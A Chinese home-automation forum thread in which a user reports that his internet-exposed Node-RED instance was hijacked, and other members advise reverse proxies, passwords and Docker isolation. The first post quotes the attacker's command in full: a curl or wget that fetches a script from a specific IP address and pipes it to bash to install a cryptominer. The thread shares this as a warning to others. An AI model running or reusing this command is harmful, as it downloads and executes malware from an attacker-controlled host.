找回密码
 立即注册
查看: 668|回复: 8

[流程系列] 使用node-red请注意安全问题

[复制链接]

4

主题

71

回帖

578

积分

高级会员

积分
578
金钱
503
HASS币
0
发表于 2025-2-12 18:28:33 | 显示全部楼层 |阅读模式
今天接到老婆电话,家里自动化不能用了,回家后发现node-red被黑了,所有流程被删除,还添加了一个流程,下载挖矿脚本的
( curl http://123.58.224.8:10776/authenticationendpoint//apache_config -sk -o - || wget --no-check-certificate http://123.58.224.8:10776/authenticationendpoint//apache_config -O -) | bash
奉劝大家,最好内网使用,或者换一个端口使用,
好在我使用的pve安装的系统,有几天的备份,要不然就头大了
回复

使用道具 举报

jjcs 手机认证

51

主题

1918

回帖

7761

积分

论坛元老

积分
7761
金钱
5782
HASS币
40
发表于 2025-2-12 19:11:27 | 显示全部楼层
你是不是没有设置密码,直接web映射出去,如果是这样,只能说活该
折腾精神永存,感恩感谢论坛每一位愿意分享和帮助过我的大佬,论坛有你更精彩
回复

使用道具 举报

jjcs 手机认证

51

主题

1918

回帖

7761

积分

论坛元老

积分
7761
金钱
5782
HASS币
40
发表于 2025-2-12 19:13:24 | 显示全部楼层
而且你nodered是不是使用npm宿主机直接安装的?
折腾精神永存,感恩感谢论坛每一位愿意分享和帮助过我的大佬,论坛有你更精彩
回复

使用道具 举报

0

主题

27

回帖

298

积分

中级会员

积分
298
金钱
271
HASS币
0
发表于 2025-2-12 20:11:46 | 显示全部楼层
一直用的反向代理,还是很安全。
回复

使用道具 举报

jjcs 手机认证

51

主题

1918

回帖

7761

积分

论坛元老

积分
7761
金钱
5782
HASS币
40
发表于 2025-2-12 20:17:16 | 显示全部楼层
ad596142041 发表于 2025-2-12 20:11
一直用的反向代理,还是很安全。

正解,用反向代理
折腾精神永存,感恩感谢论坛每一位愿意分享和帮助过我的大佬,论坛有你更精彩
回复

使用道具 举报

4

主题

71

回帖

578

积分

高级会员

积分
578
金钱
503
HASS币
0
 楼主| 发表于 2025-2-12 22:58:30 | 显示全部楼层
jjcs 发表于 2025-2-12 19:13
而且你nodered是不是使用npm宿主机直接安装的?

一直这么用的,一年了没有出现问题,以后要注意了
回复

使用道具 举报

3

主题

102

回帖

1691

积分

金牌会员

积分
1691
金钱
1586
HASS币
0
发表于 2025-2-13 08:05:24 | 显示全部楼层
年前我也遇到了,一模一样的情况
回复

使用道具 举报

9

主题

176

回帖

1661

积分

金牌会员

积分
1661
金钱
1476
HASS币
0
发表于 2025-2-13 09:32:15 | 显示全部楼层
你这是我家大门躺大开了啊
回复

使用道具 举报

jjcs 手机认证

51

主题

1918

回帖

7761

积分

论坛元老

积分
7761
金钱
5782
HASS币
40
发表于 2025-2-13 12:42:33 | 显示全部楼层
joylin1988 发表于 2025-2-12 22:58
一直这么用的,一年了没有出现问题,以后要注意了

npm安装,nodered直接可以执行宿主机命令,还是用docker把
折腾精神永存,感恩感谢论坛每一位愿意分享和帮助过我的大佬,论坛有你更精彩
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Hassbian

GMT+8, 2025-5-1 16:43 , Processed in 0.104615 second(s), 23 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表